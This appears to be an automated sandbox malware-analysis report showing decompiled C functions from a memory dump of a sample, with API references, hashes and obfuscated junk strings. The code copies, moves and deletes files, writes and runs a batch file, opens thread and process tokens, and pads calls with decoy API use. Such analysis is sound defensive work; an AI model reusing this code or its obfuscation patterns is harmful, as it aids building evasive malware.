0x00ec13cf
0x00000000
0x00000000
0x00ec13d1
0x00ec13d3
0x00ec13d3
0x00ec1393
0x00ec1393
0x00ec1393
0x00ec1395
0x00000000
0x00000000
0x00ec1397
0x00ec1399
0x00ec1399
0x00ec1678
0x00ec167f
0x00ec168c

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c795e5c13e2b51e70af62a857165845da9581301926cdcae58786cd36948639
Instruction ID: 04e2abd6f487bd0f2570192a2d9fe347eaa40cf24689c6a30d23fa287fb9b742
Opcode Fuzzy Hash: 9c795e5c13e2b51e70af62a857165845da9581301926cdcae58786cd36948639
Instruction Fuzzy Hash: 75A19A71A00209DFEB10CB98DE45FAD77B0FB5932AF515159F221BA2E2C7729942CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00EC1CA2, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

p%08x, xrefs: 00EC1D99
K4rum8fJ,9 DO UlGPuQHSBcbe23u6sWvk5wWdndVClv2JEyIrDMSEkrPCojqD9PQV3JAgTneenKLvzBj9chT5XhwUJsY8l H lhNrafrf dtvbq5N.R4C8GWX0bm2qbljE0zJCBKl76QlW5B2IkoMwXpuJPxgMvya.doQN78qnJ4FF0TxnwE5d A16m,emj5E SSjNMslsHpjS9outhjyemZ5heRZ6h,0zv,tKj4M2og tzW0Qf yHUfmEAAylx YZp, xrefs: 00EC1DCC

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateHeap
String ID: K4rum8fJ,9 DO UlGPuQHSBcbe23u6sWvk5wWdndVClv2JEyIrDMSEkrPCojqD9PQV3JAgTneenKLvzBj9chT5XhwUJsY8l H lhNrafrf dtvbq5N.R4C8GWX0bm2qbljE0zJCBKl76QlW5B2IkoMwXpuJPxgMvya.doQN78qnJ4FF0TxnwE5d A16m,emj5E SSjNMslsHpjS9outhjyemZ5heRZ6h,0zv,tKj4M2og tzW0Qf yHUfmEAAylx YZp$p%08x
API String ID: 10892065-3862171408
Opcode ID: db1dab76504ef3965cbc4be645f6ae1fae2f47ec7015952779eefe98ab2731d2
Instruction ID: e5eb2175d40698ecbd293aeb77eca98339386e321b21ac5fb45fdb7bce106efe
Opcode Fuzzy Hash: db1dab76504ef3965cbc4be645f6ae1fae2f47ec7015952779eefe98ab2731d2
Instruction Fuzzy Hash: C6618E31904208DFDB20DBA4DE45FFDBAB0AF06315F2064AEE916F61A2D7728946DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00EC4912, Relevance: 7.7, APIs: 5, Instructions: 175
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00EC4912(signed int __eax, void* __ebx, void* __edx, void* __esi, void* __fp0, struct HDC__* _a4, intOrPtr _a8) {
				struct HDC__* _v8;
				char _v12;
				WCHAR* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v164;
				char _v448;
				void* __edi;
				char _t50;
				intOrPtr _t53;
				char _t57;
				intOrPtr _t63;
				char _t66;
				int _t67;
				void* _t68;
				intOrPtr _t71;
				void* _t74;
				void* _t90;
				void* _t92;
				char* _t93;
				void* _t100;
				void* _t104;
				struct HDC__* _t105;
				void* _t106;
				char _t107;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t117;

				_t117 = __fp0;
				_t106 = __esi;
				_t104 = __edx;
				_t92 = __ebx;
				_t105 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0;
				if(_a4 == 1 || _a4 == 2) {
					_t50 = E00ED00D0(_a8,  &_v20);
					_v32 = _t50;
					__eflags = _t50 - _t105;
					if(__eflags != 0) {
						_push(_t92);
						_push(_t106);
						E00EC4751( &_v164, __eflags, _a4);
						_t53 =  *0xef56a8; // 0xf00000
						_push(_t105);
						_push(L"\\u");
						_v16 = E00ECE9D2(_t53 + 0x438);
						_push(_t105);
						_push( &_v164);
						_t93 = "\\";
						_push(_t93);
						_t57 = E00ECE9D2(_v16);
						_t112 = _t111 + 0x20;
						_v28 = _t57;
						CreateDirectoryW(_v16, _t105);
						_a4 = E00ED301C(_v20, _v32,  &_v24);
						BitBlt(_t105, 0x5a, 0x1d, 0x1d, 0x25, _t105, 3, 0x58, 0x18);
						__eflags = _a4 - _t105;
						if(_a4 > _t105) {
							_t63 =  *0xef56a8; // 0xf00000
							_t66 = E00ECF820(2, _v28, _t63 + 0xb0, 2);
							_t113 = _t112 + 0xc;
							_t107 = _t66;
							_v12 = _t107;
							_t67 = IsValidCodePage(0x35);
							__eflags = _t107 - _t105;
							if(_t107 != _t105) {
								_t68 = E00ECFDC2(_t67, _t107, _v24, _a4);
								_pop(_t100);
								__eflags = _t68;
								if(_t68 >= 0) {
									E00ECF703(_t100, _t104,  &_v12);
									_push(_t105);
									_push( &_v164);
									_t71 =  *0xef56a8; // 0xf00000
									_push(_t93);
									_v36 = E00ECE9D2(_t71 + 0x438);
									_t74 = E00ED092C(_t117, _v28, _t73);
									_t113 = _t113 + 0x18;
									__eflags = _t74;
									if(_t74 < 0) {
										_v8 = 0xfffffff9;
									}
									E00ECD1EA( &_v36, 0xfffffffe);
									_pop(_t100);
									__eflags = _v8 - _t105;
									if(__eflags == 0) {
										E00EC16D2(_t100, _t104, _t105, __eflags, 0x2deb8b96);
										__eflags = _v8 - _t105;
										_pop(_t100);
									}
									if(__eflags >= 0) {
										L18:
										E00ECD1EA( &_v32, _v20);
										__eflags = _a4 - _t105;
										if(_a4 > _t105) {
											_t105 = _a4;
										}
										E00ECD1EA( &_v24, _t105);
										E00ECD1EA( &_v16, 0xfffffffe);
										E00ECD1EA( &_v28, 0xfffffffe);
										return _v8;
									} else {
										L16:
										__imp__GetCPInfoExA(0xe, 0x26,  &_v448);
										__eflags = _v12 - _t105;
										if(_v12 != _t105) {
											E00ECF703(_t100, _t104,  &_v12);
											BitBlt(_t105, 0x2d, 0x1a, 0x18, 0x62, _t105, 0x61, 6, 0x30);
										}
										goto L18;
									}
								}
								_v8 = 0xfffffffb;
								goto L16;
							}
							_v8 = 0xfffffffc;
							goto L16;
						}
						_v8 = 0xfffffffd;
						goto L16;
					}
					_t90 = 0xfffffffe;
					return _t90;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x00ec4912
0x00ec4912
0x00ec4912
0x00ec4912
0x00ec491c
0x00ec4922
0x00ec4925
0x00ec4928
0x00ec492b
0x00ec492e
0x00ec4945
0x00ec494c
0x00ec494f
0x00ec4951
0x00ec495b
0x00ec495c
0x00ec4966
0x00ec496b
0x00ec4970
0x00ec4976
0x00ec4981
0x00ec4984
0x00ec498b
0x00ec498c
0x00ec4991
0x00ec4995
0x00ec499a
0x00ec49a1
0x00ec49a4
0x00ec49ca
0x00ec49cd
0x00ec49d3
0x00ec49d6
0x00ec49e4
0x00ec49f6
0x00ec49fb
0x00ec49fe
0x00ec4a02
0x00ec4a05
0x00ec4a0b
0x00ec4a0d
0x00ec4a1e
0x00ec4a24
0x00ec4a25
0x00ec4a27
0x00ec4a35
0x00ec4a3a
0x00ec4a41
0x00ec4a42
0x00ec4a4c
0x00ec4a57
0x00ec4a5a
0x00ec4a5f
0x00ec4a62
0x00ec4a64
0x00ec4a66
0x00ec4a66
0x00ec4a73
0x00ec4a79
0x00ec4a7a
0x00ec4a7d
0x00ec4a84
0x00ec4a89
0x00ec4a8c
0x00ec4a8c
0x00ec4a8d
0x00ec4ac3
0x00ec4aca
0x00ec4ad3
0x00ec4ad6
0x00ec4ad8
0x00ec4ad8
0x00ec4ae0
0x00ec4aeb
0x00ec4af6
0x00000000
0x00ec4a8f
0x00ec4a8f
0x00ec4a9a
0x00ec4aa0
0x00ec4aa3
0x00ec4aa8
0x00ec4abd
0x00ec4abd
0x00000000
0x00ec4aa3
0x00ec4a8d
0x00ec4a29
0x00000000
0x00ec4a29
0x00ec4a0f
0x00000000
0x00ec4a0f
0x00ec49d8
0x00000000
0x00ec49d8
0x00ec4955
0x00000000
0x00ec4936
0x00000000
0x00ec4936

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 00EC49A4
BitBlt.GDI32(00000000,0000005A,0000001D,0000001D,00000025,00000000,00000003,00000058,00000018), ref: 00EC49CD
GetCPInfoExA.KERNEL32(0000000E,00000026,?), ref: 00EC4A9A
BitBlt.GDI32(00000000,0000002D,0000001A,00000018,00000062,00000000,00000061,00000006,00000030), ref: 00EC4ABD

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectoryInfo
String ID:
API String ID: 4249116062-0
Opcode ID: e650ceaedc48b3b6acf3a32de707eb1718e4f700beb36a3d4c36ac73c7b78c9a
Instruction ID: 0a588b2c1c2d56496f6bdf7f0774ab357cd1b8c50c9e4d06f508bb5199a84a5d
Opcode Fuzzy Hash: e650ceaedc48b3b6acf3a32de707eb1718e4f700beb36a3d4c36ac73c7b78c9a
Instruction Fuzzy Hash: 615180B1940219BEDF20DBA4DD46FEE7BB8EB45314F20512AF520B61D1E7329B42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED092C, Relevance: 7.6, APIs: 5, Instructions: 62
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00ED092C(void* __fp0, WCHAR* _a4, WCHAR* _a8) {
				signed int _v8;
				char _v12;
				void _v530;
				int _v532;
				void* __edi;
				void* __esi;
				int _t18;
				intOrPtr _t24;
				void* _t34;
				WCHAR* _t39;

				_v8 = 0;
				_t18 = CopyFileW(_a4, _a8, 0);
				_t42 = _t18;
				if(_t18 != 0) {
					L4:
					DeleteFileW(_a4);
				} else {
					_v532 = _t18;
					memset( &_v530, 0, 0x206);
					_v12 = E00ED3A82(_t34, 0x75d);
					_t24 =  *0xef56a8; // 0xf00000
					_push(E00EDCF06(_t42, __fp0, _t24 + 0x648, 1, 0xf4240));
					_t39 =  &_v532;
					E00ECE17D(0x103, _t39, _v12, _a8);
					E00ED0299( &_v12);
					if(MoveFileW(_a8, _t39) == 0 || CopyFileW(_a4, _a8, 0) == 0) {
						_v8 = _v8 | 0xffffffff;
					} else {
						goto L4;
					}
				}
				return _v8;
			}

0x00ed0943
0x00ed0949
0x00ed094b
0x00ed094d
0x00ed09d9
0x00ed09dc
0x00ed0953
0x00ed0959
0x00ed0968
0x00ed0977
0x00ed097a
0x00ed0991
0x00ed099d
0x00ed09a3
0x00ed09ac
0x00ed09c3
0x00ed09d3
0x00000000
0x00000000
0x00000000
0x00ed09c3
0x00ed09e8

APIs

CopyFileW.KERNEL32(00ED0A7F,?,00000000,?), ref: 00ED0949
memset.MSVCRT ref: 00ED0968

Part of subcall function 00ECE17D: _vsnwprintf.MSVCRT ref: 00ECE192

MoveFileW.KERNEL32(?,?), ref: 00ED09BA
CopyFileW.KERNEL32(00ED0A7F,?,00000000), ref: 00ED09CD
DeleteFileW.KERNEL32(00ED0A7F), ref: 00ED09DC

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: File$Copy$DeleteMove_vsnwprintfmemset
String ID:
API String ID: 1114508814-0
Opcode ID: f522dc4cae74b153f0e37ee1c3abf08fadcb3fba758a1b8e4c61369e6d16b179
Instruction ID: 7a7903d0cd100ef02e0ed99a39a12898ee8d0884ee80590264c3f08e50c8a40a
Opcode Fuzzy Hash: f522dc4cae74b153f0e37ee1c3abf08fadcb3fba758a1b8e4c61369e6d16b179
Instruction Fuzzy Hash: 1A11603194020CBFDF21ABA5DC49FDE7F69EF44760F005452B918B62A1D7B18B91DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EDF590, Relevance: 7.6, APIs: 5, Instructions: 57
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00EDF590(char* __eax, long long __fp0, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t12;
				signed int _t14;
				char** _t24;
				char _t27;
				long long _t34;
				void* _t37;

				_t34 = __fp0;
				_t12 = __eax;
				L00EDFD52();
				_t27 =  *__eax;
				_t24 = _a4;
				if( *_t27 != 0x2e) {
					_t12 = strchr( *_t24, 0x2e);
					if(_t12 != 0) {
						 *_t12 =  *_t27;
					}
				}
				L00EDFD34();
				 *_t12 =  *_t12 & 0x00000000;
				_t14 = strtod( *_t24,  &_v8);
				_v16 = _t34;
				_t37 = st0;
				asm("fucomp st2");
				asm("fnstsw ax");
				st1 = _t37;
				if((_t14 & 0x00000044) != 0) {
					st0 = _t37;
					goto L7;
				} else {
					asm("fchs");
					asm("fucompp");
					asm("fnstsw ax");
					if((_t14 & 0x00000044) != 0) {
						L7:
						L00EDFD34();
						if( *_t14 != 0x22) {
							goto L5;
						} else {
							return _t14 | 0xffffffff;
						}
					} else {
						L5:
						 *_a8 = _v16;
						return 0;
					}
				}
			}

0x00edf590
0x00edf590
0x00edf598
0x00edf59d
0x00edf5a2
0x00edf5a5
0x00edf5ab
0x00edf5b4
0x00edf5b8
0x00edf5b8
0x00edf5b4
0x00edf5ba
0x00edf5bf
0x00edf5c8
0x00edf5cd
0x00edf5db
0x00edf5de
0x00edf5e1
0x00edf5e3
0x00edf5e8
0x00edf604
0x00000000
0x00edf5ea
0x00edf5ea
0x00edf5ef
0x00edf5f1
0x00edf5f6
0x00edf606
0x00edf606
0x00edf60e
0x00000000
0x00edf610
0x00edf614
0x00edf614
0x00edf5f8
0x00edf5f8
0x00edf5fe
0x00edf603
0x00edf603
0x00edf5f6

APIs

localeconv.MSVCRT ref: 00EDF598
strchr.MSVCRT ref: 00EDF5AB
_errno.MSVCRT ref: 00EDF5BA
strtod.MSVCRT ref: 00EDF5C8
_errno.MSVCRT ref: 00EDF606

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 51c04a0ed25bfa1212a6085e4773c24c998d58bb3e87429c7f1c36482860ebab
Instruction ID: ec0936445654d24f51aa1886ebd2854f150ca2aaacf922f398d786e8a4319dd9
Opcode Fuzzy Hash: 51c04a0ed25bfa1212a6085e4773c24c998d58bb3e87429c7f1c36482860ebab
Instruction Fuzzy Hash: CB010032900009EACB12AB24E4457D93FF5EF06361F3050E2E5A27A2A1DB368916CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ECE34D, Relevance: 7.5, APIs: 5, Instructions: 29
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ECE34D(void* __ecx) {
				void* _v8;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0 || GetLastError() == 0x3f0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					return _v8;
				} else {
					return 0;
				}
			}

0x00ece368
0x00ece396
0x00ece38e
0x00ece391
0x00ece391

APIs

GetCurrentThread.KERNEL32 ref: 00ECE359
OpenThreadToken.ADVAPI32(00000000,?,00ECE668,00000105), ref: 00ECE360
GetLastError.KERNEL32(?,00ECE668,00000105), ref: 00ECE36A
GetCurrentProcess.KERNEL32(00000008,00000105,?,00ECE668,00000105), ref: 00ECE37D
OpenProcessToken.ADVAPI32(00000000,?,00ECE668,00000105), ref: 00ECE384

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CurrentOpenProcessThreadToken$ErrorLast
String ID:
API String ID: 102224034-0
Opcode ID: 762bf8e8e4c88a2389f68cf69d749e9173024dce9be52af866d9f61ab277aa96
Instruction ID: 79becfa364121ae169ce032e6d27910afef3639c559674da4a735408303b843c
Opcode Fuzzy Hash: 762bf8e8e4c88a2389f68cf69d749e9173024dce9be52af866d9f61ab277aa96
Instruction Fuzzy Hash: 2EE0653160024CEFDB10DBF6AD49F5E37ACEB00758F404458F206FA190DBB0DA484720

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9E85, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00EC9E85(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				char _t26;
				void* _t36;
				intOrPtr _t37;
				intOrPtr _t39;
				signed int _t43;
				signed int _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				struct HDC__* _t52;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t71;

				_t71 = __fp0;
				_t52 = 0;
				_v12 = 0;
				_v24 = 0;
				_t23 = E00ECEC55(__eflags, "bat");
				_v8 = _t23;
				if(_t23 != 0) {
					_t24 = E00ECD239(0x400);
					_t63 = _t24;
					_v20 = _t63;
					__eflags = _t63;
					if(_t63 != 0) {
						_t26 = E00ED3A6B();
						_push(_a8);
						_v16 = _t26;
						E00ECE20F(0x400, _t63, _t26, _a4);
						E00ED02B3( &_v16);
						E00ED32EB(_v8, _t63, E00ECFE78(_t63));
						E00ECD1EA( &_v20, 0xffffffff);
						__eflags = E00ECDD64(_v8,  &_v24, 0, 1);
						if(__eflags != 0) {
							_t64 = 0;
							__eflags = 0;
							while(1) {
								_t36 = E00ED32C2(_a8);
								__eflags = _t36 - _t52;
								if(__eflags != 0) {
									break;
								}
								_t49 =  *0xef56c8; // 0x520f6c8
								 *((intOrPtr*)(_t49 + 0xb4))(0x64);
								_t64 = _t64 + 1;
								__eflags = _t64 - 0xc8;
								if(__eflags < 0) {
									continue;
								}
								L11:
								_t65 = 0;
								while(1) {
									CreateEnhMetaFileA(_t52, "qkLVPHWOQnIzk7O12WwzDptgHLfRn7W4JgJZmO1Xui fcUuwQL7mlWBhEh 2Czg8lFKDfSE2UgvCz iagaChHkRKNg4soCnquN2KnCeuy3MZC3 8afTCyvJwJs.9rKn8Tf3tLCTPqipTATmP XvqdYgYFIHGiSSG.2tBf5RjL G,S94feP,GHba6 aAUOSVgj4N OR8trwkUApQt 3qXKTXlxmbtfWd3ZsqS1KnRjIXi7ehvnfLCir,SuHi18HD6XiDG0BPvPC5 YFvp H4jRHGVHw,yJC,vvYGn8 d4ubR4rcsqQo8wzbNmDQfm.0FUrkA0Ts6XemO36f3 CIdZWyYyDrZUGdJcsg 73cRObNP.nMwqp1uJl6j3OGDvGCryYC6yZzfwOjG6SB VpiPbQ.VgfMINz2w0WCL xoA02QfSIPVVrm3eyR8qPdau 8o95MoJLCSFf2J,OBZnhaENCqv7SEAONSU241f C1 vX4kBJvX3fGi2PKkn1xMGrj WxpbBdLi1RD3n74QJMoQ zJwsT 6JZfM itF5,J6rV9zwcYT9UTg1Yx5IwOvl.kTr6Dz jpG 2W7547ysFNL 0h  ORDkmJ7fjiIRjG,U2zaM4CSQDtYgXgIyBxwsBVUgFdUP4IjlZG JOX5IlksIx1,1e.,jgmUz2v5vqxeOQkT sXLsqgGOF1wyc8o2FWIodIAmI,YJunZ4mwuSoNBcT,aDDbZRI7xtZaXvGw2OSt2qqYj6,uoZQfChagZW5SogYvkh36OndJamxmz6RVTQDeygXCPibMCjAsYZBluGufAfw2vSq vuYzaeh3SYe63t qYoZPzC4nmqAiRWnEi YcqeD6.ziol3cp2zWGP3C55HeCi.PP8TJNe2 qQrFO9qs50lEm7u2v1Z3CqZjtw9gAIELhPCqNuEJxAQRns1JoVkOG ZyTmRFBhnf6LNHSYxk  nwAZiJRJigesARivMJqJGItjWZm7Ou8dnnkppCJNjtRjpq ,KVJa MyGUFe9rqrf5z7d27Gn Oc2cRnXYKljQEEVBqELK3m9r shWI.KjlfJgS4DemU,5pfeP8ZX 8sLFgLY2fvfv4z oTIwb.CoWT8 CKH2 .WylCb 4UDNUtgtmbl.CO0SAp8YBFIdX07uim.pa,v83,xlIPpya9E22.IsMtlmu RudU.", _t52, _t52);
									_t43 = E00ED09E9(_v8, __eflags, _t71);
									__eflags = _t43;
									if(_t43 != 0) {
										break;
									}
									_t47 =  *0xef56c8; // 0x520f6c8
									 *((intOrPtr*)(_t47 + 0xb4))(0x1f4);
									_t65 = _t65 + 1;
									__eflags = _t65 - 0x14;
									if(_t65 < 0x14) {
										_t52 = 0;
										__eflags = 0;
										continue;
									}
									break;
								}
								E00ECD1EA( &_v8, 0xfffffffe);
								_t46 = _v12;
								L16:
								return _t46;
							}
							_t37 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t37 + 0x30))(_t36);
							_t39 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t39 + 0xb4))(0x3e8);
							IsValidCodePage(0x57);
							goto L11;
						}
						_v12 = _v12 | 0xffffffff;
						goto L11;
					}
					_t46 = _t24 | 0xffffffff;
					goto L16;
				}
				return _t23 | 0xffffffff;
			}

0x00ec9e85
0x00ec9e8c
0x00ec9e93
0x00ec9e96
0x00ec9e99
0x00ec9e9f
0x00ec9ea4
0x00ec9eb6
0x00ec9ebb
0x00ec9ebe
0x00ec9ec1
0x00ec9ec3
0x00ec9ed2
0x00ec9ed7
0x00ec9eda
0x00ec9ee1
0x00ec9ee9
0x00ec9ef9
0x00ec9f04
0x00ec9f1b
0x00ec9f1d
0x00ec9f25
0x00ec9f25
0x00ec9f27
0x00ec9f2a
0x00ec9f30
0x00ec9f32
0x00000000
0x00000000
0x00ec9f34
0x00ec9f3b
0x00ec9f41
0x00ec9f42
0x00ec9f48
0x00000000
0x00000000
0x00ec9f6d
0x00ec9f6d
0x00ec9f73
0x00ec9f7b
0x00ec9f84
0x00ec9f89
0x00ec9f8b
0x00000000
0x00000000
0x00ec9f8d
0x00ec9f97
0x00ec9f9d
0x00ec9f9e
0x00ec9fa1
0x00ec9f71
0x00ec9f71
0x00000000
0x00ec9f71
0x00000000
0x00ec9fa1
0x00ec9fa9
0x00ec9fae
0x00ec9fb3
0x00000000
0x00ec9fb4
0x00ec9f4d
0x00ec9f52
0x00ec9f55
0x00ec9f5f
0x00ec9f67
0x00000000
0x00ec9f67
0x00ec9f1f
0x00000000
0x00ec9f1f
0x00ec9ec5
0x00000000
0x00ec9ec5
0x00000000

Strings

qkLVPHWOQnIzk7O12WwzDptgHLfRn7W4JgJZmO1Xui fcUuwQL7mlWBhEh 2Czg8lFKDfSE2UgvCz iagaChHkRKNg4soCnquN2KnCeuy3MZC3 8afTCyvJwJs.9rKn8Tf3tLCTPqipTATmP XvqdYgYFIHGiSSG.2tBf5RjL G,S94feP,GHba6 aAUOSVgj4N OR8trwkUApQt 3qXKTXlxmbtfWd3ZsqS1KnRjIXi7ehvnfLCir,SuHi18HD6XiDG, xrefs: 00EC9F75
bat, xrefs: 00EC9E8E

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: bat$qkLVPHWOQnIzk7O12WwzDptgHLfRn7W4JgJZmO1Xui fcUuwQL7mlWBhEh 2Czg8lFKDfSE2UgvCz iagaChHkRKNg4soCnquN2KnCeuy3MZC3 8afTCyvJwJs.9rKn8Tf3tLCTPqipTATmP XvqdYgYFIHGiSSG.2tBf5RjL G,S94feP,GHba6 aAUOSVgj4N OR8trwkUApQt 3qXKTXlxmbtfWd3ZsqS1KnRjIXi7ehvnfLCir,SuHi18HD6XiDG
API String ID: 0-3787645507
Opcode ID: c1b5d90fd20beb8811db14438d03f533da9b2c3afba38db8267723dd875312e7
Instruction ID: 292a7a94bb20b51eb2705c58bc745199000e7774f75cba6b991f744c70fce54b
Opcode Fuzzy Hash: c1b5d90fd20beb8811db14438d03f533da9b2c3afba38db8267723dd875312e7
Instruction Fuzzy Hash: CE31CB71A04214AFD710ABA4DE8EFBEB7E8EB04320F11117DF625F61A2D7728A029750

Uniqueness

Uniqueness Score: -1.00%

Function 00EC1FBC, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00EC1FBC(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				char _v316;
				intOrPtr _v320;
				char _v356;
				intOrPtr _v360;
				signed int _v364;
				intOrPtr _v368;
				char _v404;
				intOrPtr _v408;
				signed int _t61;
				signed int _t64;
				intOrPtr _t74;
				signed int _t76;
				signed int _t79;
				signed int _t81;
				void* _t90;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v20 = E00ECEF54(0, _a4, E00ECFE78(_a4));
				__imp__GetCPInfoExA(0x5e, 0x46,  &_v316);
				_t61 = E00EC24CE(_t97,  &_v24,  &_v12);
				_v28 = _t61;
				if(_v28 != 0) {
					_v16 = _v16 & 0x00000000;
					while(1) {
						__eflags = _v16 - _v24;
						if(_v16 >= _v24) {
							break;
						}
						_v320 = 0x24;
						_t74 = E00ECD177( &_v356, "h1ReLE3e.9bm00AEE0XT6kHj wKibx KH6sqN Z18 trGjygPcwH1O2SeO7  e.1brr6MlnQ6AUvRDVmV4oxvKjV0V.UoV2l2IyF7qKvty2IJs,BRXXYk JzxRUJIp7H.sVW0ttOthCEhWQ7o 3ceVi3xP3a4T6Q UPvHhfkmbwHHGj7QUNb3NSs2Zs9G6OdmyyI Tk4eYGLdOEX.8HyeVXPNMGB dA1fSyjqHFdBIvaPqunWQLjTpRqBCygMGTn.TG.6Cm4 7,ZVok3CuPYvLeevYRNOyp U8o2 oir8.djTlrwy3aG zgFs.yK4xW7  YDtH5.tXw XGDFUc0vi fXj,ShX 1OOneYG0wEwOuEQ2J6InEIsiPz7u73aYGglm qI qB1oOMbu6AhbuZyMsldF fyuqDROf1d9Vkr4RgDk DlwP,LGtBlDtEym5aNkxSHAS,.IoplbdtvV0IlVBGg4XoptdntV.r3 jsVx DkJF8xCmzPTz9qvzqFhg7ivQBf0oLo9kAGiNrPl9jQjyNZ vOGDKYiLsq7f C8fXU9O LqoH4kInMguRj3TdCPEms0CS3VNIpa5loc l8 afK1,VwhlaZNtWp AzRSLJbx1Rnx.yN4dfj ZldAarikG0,L GO,LnSd6a1Rn.qk8qGJNfxQ7vUy2QcvT,l8UlPxiXpuXiffR6Sihgld9MohHoszlMhcOo6 B plvuTcDd w727bOyyEr2EPKDU6GkX4H2N6xeIlBksagR9N1VmvTDK1VkF2CI3H.B  pXlj2U0JVNCHdwYrLsyEkqR2RmMo QSEnNdIAEjQcVClVw5qko5BO pil.C7. Iid3KNoyORH2Ma7e ISfhw8Iu4fcAjpEfwVQr xOW29 DjlYA35XAnc4rhUT 6dajMX9zqX,mGBJcJVrje8iDPNDagA3Rjsnd gB5sVC NTmz8oF38P2K8sYXpyuAx,Du.200MYAbL,i7b8e7xeGdr,7U0R6vzvI KvqWRhfJt4Q0zPTHlkzPo2AEZl40moIXVQO2Cfhnzyg.xe88uQS03hiNIbmu5CndXM73IzKYdu9w11lATdiZIBrvI6UfGxHZJTApFk6yXIQFxQ19eP Khh5LE,CIBFfuEyuzVGZFGEBiW1M5 qLlgaWqZVrW3NayPRHtZU,rmQoX4exxOghbQeTM2S6jfq8iOmXlpbC9e3oqzhnEzohuw pRB1Vhzw.De9JiDwiGlFOl7Cv4L2XqQ  8m ytpgSVE1 slpjbnDdqjeguTIX8cr3b0Ye9OR  KzDSD40ZjwaZu ZA9M3XEm,V6cmwnw5QfbldFUqq5N, Fw gdjB838j4ffCbZ Rcdd3DTmT1MtkSavmjCJoL  H7BTA M9SJFmj2YGABO ue0XTwh2p KaAQCB3xFFbObWNbA24i uQ2Z.nug3Jubz qelr", _v320);
						_t98 = _t98 + 0xc;
						_v360 = _t74;
						_t76 = _v16 * 0x18;
						_t95 = _v28;
						__eflags =  *((intOrPtr*)(_t95 + _t76)) - _v20;
						if( *((intOrPtr*)(_t95 + _t76)) != _v20) {
							_t79 = _v16 + 1;
							__eflags = _t79;
							_v16 = _t79;
							continue;
						}
						_t81 = _v16 * 0x18;
						__eflags = _t81;
						 *((intOrPtr*)(_v28 + _t81 + 0x14)) = 1;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						break;
					}
					__eflags = _v16 - _v24;
					if(__eflags != 0) {
						_t64 = E00EC1B45(_t97, __eflags, _v28, _v24);
						_pop(_t90);
						__eflags = _t64;
						if(_t64 < 0) {
							_v8 = 0xfffffffe;
						}
						_v364 = _v364 & 0x00000000;
						_v364 = E00EC111F(_t64, _t90, _v20);
						__eflags = _v364;
						if(_v364 >= 0) {
							E00EC2192(_v364);
						}
						L19:
						E00EC1000( &_v28, _v24);
						_v368 = 0x1a;
